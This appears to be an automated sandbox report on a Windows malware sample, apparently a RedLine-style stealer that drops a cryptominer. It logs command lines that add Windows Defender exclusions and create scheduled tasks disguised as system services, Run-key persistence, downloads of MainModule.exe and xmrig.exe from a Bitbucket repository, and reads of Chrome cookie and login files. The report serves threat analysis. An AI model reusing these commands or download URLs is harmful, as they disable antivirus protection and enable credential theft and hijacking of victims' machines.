Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Feb. 21, 2023, 1:27 p.m. | Feb. 21, 2023, 1:33 p.m. |
-
-
-
cmd.exe "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
2276-
chcp.com chcp 1251
1700 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
1692 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
2616 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
2676
-
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
204-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1168
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1096-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1212
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
948-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2172
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2812-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2184
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2040-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2844
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2680-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1956
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2800-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2004
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2684-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2108
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1532-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2492
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2808-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1372
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2912 -
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2764-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2496
-
-
-
chcp.com chcp 1251
2672
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.141.1 | |
bbuseruploads.s3.amazonaws.com |
CNAME
s3-1-w.amazonaws.com
|
52.217.206.129 |
transfer.sh | 144.76.136.153 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49170 52.216.212.249:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49209 104.192.141.1:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49169 104.192.141.1:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49181 104.192.141.1:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49182 54.231.132.1:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49210 52.217.40.228:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 |
request | GET https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe |
request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 |
request | GET https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe |
request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 |
request | GET https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe |
request | GET https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\update.exe |
file | C:\ProgramData\Dllhost\dllhost.exe |
file | C:\ProgramData\Dllhost\winlogson.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
file | C:\Users\test22\AppData\Local\Temp\update.exe |
file | C:\Users\test22\AppData\Local\Temp\update.exe |
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | RedLine stealer | rule | RedLine_Stealer_m_Zero |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | chcp 1251 |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
host | 168.119.228.126 |
description | dllhost.exe tried to sleep 2728168 seconds, actually delayed analysis time by 2728168 seconds | |||
description | update.exe tried to sleep 2728288 seconds, actually delayed analysis time by 2728288 seconds |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dllhost | reg_value | C:\ProgramData\Dllhost\dllhost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray | reg_value | C:\Windows\System32\SecurityHealthSystray.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender | reg_value | C:\Program Files\Windows Defender\MpCmdRun.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Cortana | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe\Cortana.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE | reg_value | C:\Windows\System32\wbem\WmiPrvSE.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable | reg_value | C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NvStray | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe | ||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9462" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk4940" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk4087" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk3555" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
